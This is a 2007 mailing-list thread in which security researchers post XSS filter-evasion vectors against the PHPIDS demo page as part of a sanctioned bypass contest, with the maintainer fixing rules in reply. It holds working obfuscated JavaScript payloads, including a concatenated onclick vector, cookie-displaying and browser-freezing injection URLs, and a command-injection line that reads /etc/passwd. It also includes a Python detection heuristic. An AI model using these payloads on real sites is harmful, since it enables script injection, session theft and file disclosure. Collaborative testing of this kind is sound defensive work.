After talking to Christian and SirDarckCat I decided to make this post
- even if it may sound a little bit provocative ;) We spent lots of
time on the rules and, except for some details, we are pretty content
with them.
So if you like and find some time, give them a new try - anyone who
manages to create an XSS on the demo page will be mentioned in the
next release notes and will (if wanted) get a dedicated interview on
the blog (SirDarckCat's interview will appear in the next days - he was
again quicker than light with some vectors mentioned in the release
post).
Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+
Any vector which is able to create an alert/content change via JS
on the demo page counts - as long as a PoC of whatever form can be
provided. A similar contest will follow in the next weeks for SQL
Injection.
Greetings and have fun!
.mario
http://hackademix.net/2007/09/04/phpids-threesome/
Told you string concatenation was tough :)
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
URL=name
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
It should work because I tested it locally; however, it doesn't seem to
execute on your site. I've no idea why; maybe some characters are
causing the onclick handler to produce invalid data. The code above gets
past your filters though.
Tested this in Firefox locally and it worked:
<a onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;
s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':0;
s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':0;
s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;"
href="?test=test">Test</a>
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
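A defender-side illustration of the concatenation normalization this thread keeps coming back to (Mario's "concatenation algorithm" recode), added here as an example and not PHPIDS's own converter code: a Python heuristic that joins the contents of every string literal in the decoded attribute value, so fragments stitched together through variables and ternaries reappear as one keyword that an ordinary rule can match. The sample input is the onclick vector posted above; the keyword list and function names are assumptions for the example.

```python
import re

# Constructed sample: the onclick vector from the post above, as the
# attribute value a server-side filter would see after URL decoding.
SAMPLE = ("h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';"
          "s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':0;"
          "s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':0;"
          "s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;")

# JS string literals in single or double quotes; backslash escapes are
# consumed so an escaped quote does not end the literal early.
LITERAL = re.compile(r"'((?:\\.|[^'\\])*)'|\"((?:\\.|[^\"\\])*)\"")

# Assumed keyword list: things that have no business appearing in an
# attribute value once the pieces are put back together.
SUSPICIOUS = ("javascript:", "alert(", "eval(", "href", "document.cookie")


def joined_literals(src: str) -> str:
    """Concatenate the contents of every string literal in source order.

    Padding literals ('') contribute nothing, and fragments that were
    assembled through variables (s8=s1+s2+...) or ternaries
    (s4=''==''?':':0) still end up adjacent, so the hidden keyword
    reappears regardless of how the author stitched it together.
    """
    # findall yields (single_quoted, double_quoted); one of the two is ''.
    return "".join(a + b for a, b in LITERAL.findall(src))


def flag(src: str) -> list:
    """Return the suspicious keywords seen in the raw text or in the
    joined literal stream (an empty list means nothing was spotted)."""
    haystack = src.lower() + "\n" + joined_literals(src).lower()
    return [k for k in SUSPICIOUS if k in haystack]


if __name__ == "__main__":
    print(joined_literals(SAMPLE))   # hrefjavascript:alert(1)
    print(flag(SAMPLE))              # ['javascript:', 'alert(', 'href']
    print(flag("msg = 'Hello, ' + user + '!';"))  # []
```

The later vectors in the thread that pull single characters out of a regex literal (`''+/abcdefg/`) or route through `String`/`eval` lookups reassemble strings by index rather than by literal, which this folding alone does not expose; those are exactly the cases where the thread shows literal folding is not enough on its own.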
I think I might have found 1 vector already
On Sep 7, 4:54 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Yep - very nice and strange one indeed! But fixed. The concatenation
> algorithm has received a recode - hope that will stop the next wave ;)
>
> Greetings and thanks!
> .mario
>
> 2007/9/6, Gareth <gazhe...@gmail.com>:
I sent you the questions, Gareth. Next would be kishor and giorgio if
you guys would like to.
On Sep 8, 2:58 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
I've written a simple script to conduct concatenation attacks, so if
anyone wants to improve it or add new vectors please do and send them
to the group.
The reason I think it is needed is the number of possible
combinations, and having an automated tool like this would help with
unit testing of the code. You never know when a vector could creep
back in, you see.
Tool available here:-
www.businessinfo.co.uk/labs/phpids/phpids.php.zip
On Sep 10, 9:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>
> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...
>
> > On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > >http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
>
> --
> _______________________
> php-ids.org
<script type="text/javascript">window.name=''</script>
Which the PHPIDS could include in the header of the page.
Mario: do you prefer these posted here or at sla.ckers or both?
On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>
> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...
>
> > On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > >http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
>
> --
> _______________________
> php-ids.org
A redirect to google.
If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
the site opens and immediately closes (close()).
The following two lock up the browser with 100% CPU activity.
http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%62%65%72%2E%4D%41%58%5F%56%41%4C%55%45%3B%2B%2B%69%29%7B%31%7D
http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D
This is an Opera-specific thing which you could use to spam up the
"error console" using an endless loop. opera.postError(1);
On 10 Sep., 16:03, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
> > so here's a similar one but eliminates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>
> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...
Nice stuff - I didn't know about the opera specific JS - is there a
link to inform about that stuff?
Needless to say that the rules are *fixed* ;)
Thanks man!
.mario
On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> A few of my findings.
>
> A redirect to google.
>
> http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> the site opens and immediately closes (close()).
>
> The following two lock up the browser with 100% CPU activity.
>
On Aug 28, 3:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
Muhahahahahaha
On Sep 10, 11:10 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediately closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>
Well the only real source I know of is here
http://www.howtocreate.co.uk/operaStuff/operaObject.html.
And a file once included with earlier opera versions jsconsole.html
(http://people.opera.com/byberg/jsconsole.html,
http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole.html)
xorrer
On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediately closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>
Dr Evil strikes again muwhahaahaha
I tried to create the smallest possible vector to see if it was
possible; this is dangerous because you can call functions or assign
functions using this technique. Combine it with string concatenation
and there's pretty much anything you can do.
On Sep 11, 12:33 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Thanks xorrer!
>
> @Gareth: This one is evil. damn!
>
> 2007/9/11, xorrer <obhvsbypqg...@gmail.com>:
>
> > On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
> > wrote:
> > > Nice stuff - I didn't know about the opera specific JS - is there a
> > > link to inform about that stuff?
>
> > Well the only real source I know of is here
> >http://www.howtocreate.co.uk/operaStuff/operaObject.html.
> > And a file once included with earlier opera versions jsconsole.html
> > (http://people.opera.com/byberg/jsconsole.html,
> >http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole...
It's unbelievable that JavaScript allows variables to be called just
'_', don't you think, lol
I always say building things is a lot harder than breaking them ;)
On Sep 11, 12:59 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> That's indeed DrEvilish - damn - this is working in dozens of
> combinations...
>
> _=alert, 'a',1;_(1);
>
> _=alert,
> 1,1;_(1);
>
> _=alert, 1,
> 1
> _(1);
>
> _=alert, 'a',1 , _ (1);
>
> Man - it's going to be really hard to find a pattern.
>
> 2007/9/11, Gareth <gazhe...@gmail.com>:
Also... I would like to test some of the path traversal injections but
am not sure what would be considered 'passing'. For example...
http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/
passwd in the right context, and you have filters that search for etc
and /etc/passwd outright, so I presume PHPIDS _should_ catch such
things...
On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
> I like how the error page shows the vector in an input box now... but
> could you make it a bit wider?
>
> Also... I would like to test some of the path traversal injections but
> am not sure what would be considered 'passing'. For example... http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/
On Sep 12, 9:43 am, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28...
>
> On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
>
> > I like how the error page shows the vector in an input box now... but
> > could you make it a bit wider?
>
> > Also... I would like to test some of the path traversal injections but
> > am not sure what would be considered 'passing'. For example... http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/
see http://sla.ckers.org/forum/read.php?12,8085,15889,page=7#msg-15889
for an explanation.
On Sep 10, 10:03 am, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
> > so here's a similar one but eliminates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>
> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...
On Sep 14, 4:39 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> This is plain awesome - already commented on that one on slackers. Thanks,
> thornmaker!!!
>
> 2007/9/14, thornmaker <thornma...@gmail.com>:
>
> >http://demo.php-ids.org/?test=%7B%7A%3D%28%31%3D%3D%34%29%3F%68%65%72...
>
> > see http://sla.ckers.org/forum/read.php?12,8085,15889,page=7#msg-15889
On Sep 14, 8:05 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Hehe - you managed to catch a 15 second window when I uploaded a faulty file
> ;)
>
> 2007/9/15, thornmaker <thornma...@gmail.com>:
Just some other stuff, again tested on Opera. Nothing special, just
something to mess up the page a little.
http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F%64%65%28%74%72%75%65%29%3B
Btw. the last injections from thornmaker and kishord and the first of
mine above didn't execute on Opera, only in Firefox.
Xorrer
On Sep 15, 6:00 am, thornmaker <thornma...@gmail.com> wrote:
> a ternary operator based injection: http://demo.php-ids.org/?test=%61%3D%31%3D%3D%31%3F%31%3D%3D%31%2E%3F...
Xorrer
On Sep 15, 10:19 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> Displays cookie and the string XSS (based on thornmaker's and kishord's
> work. thanks for the x='eval';n=0.[x] trick)
>
> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...
>
> Just some other stuff, again tested on Opera. Nothing special, just
> something to mess up the page a little.
>
> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...
>
> http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F...
On Sep 15, 12:15 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Nice one, xorrer! Your first ones I fixed by accident while working on
> thornmaker's and kishor's examples but the second one came unexpected ;) I did
> a slight modification on the converter to fix it. Thx!
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
> > Basic concept still works.
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
Thanks. You can just list me up as xorrer, no webpage to link to.
On Sep 15, 3:34 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Well - I think I got it this time ;)
>
> @xorrer: I'd like to add you to the credits page - you want to be mentioned
> as xorrer or with your full name? You have a website you want to link your
> name to?
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
> > It's still possible
>
> >http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61...
On Sep 15, 6:10 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Argh - one second after the release ;)
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
> > oh... and btw it still works. and this time i took the time to clean
> > up the vector a little
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
On Sep 15, 12:53 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Well - this issue seems to be way harder to solve than I originally thought.
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
> > Still works along the same lines
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
> --
> _______________________
> php-ids.org
Those ternary ones are tough to prevent.
I have a vector which fails by just one character. But I would like to
share it anyway.
If you remove the closing bracket, it passes the IDS, but then the
eval won't work.
And with my setup there is no way to escape this regex
_START_,.+=.+(\?|,).*\)_END_ or am I wrong?
On Sep 15, 9:00 pm, thornmaker <thornma...@gmail.com> wrote:
> nice work xorrer!
> here's another ternary one to add to the mix: http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27...
On Sep 15, 11:31 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> Good stuff thornmaker.
>
> Those ternary ones are tough to prevent.
>
> I have a vector which fails by just one character. But I would like to
> share it anyway.
>
> http://demo.php-ids.org/?test=%61%3D%5B%27%27%2C%5D%3B%0D%0A%62%3D%5B...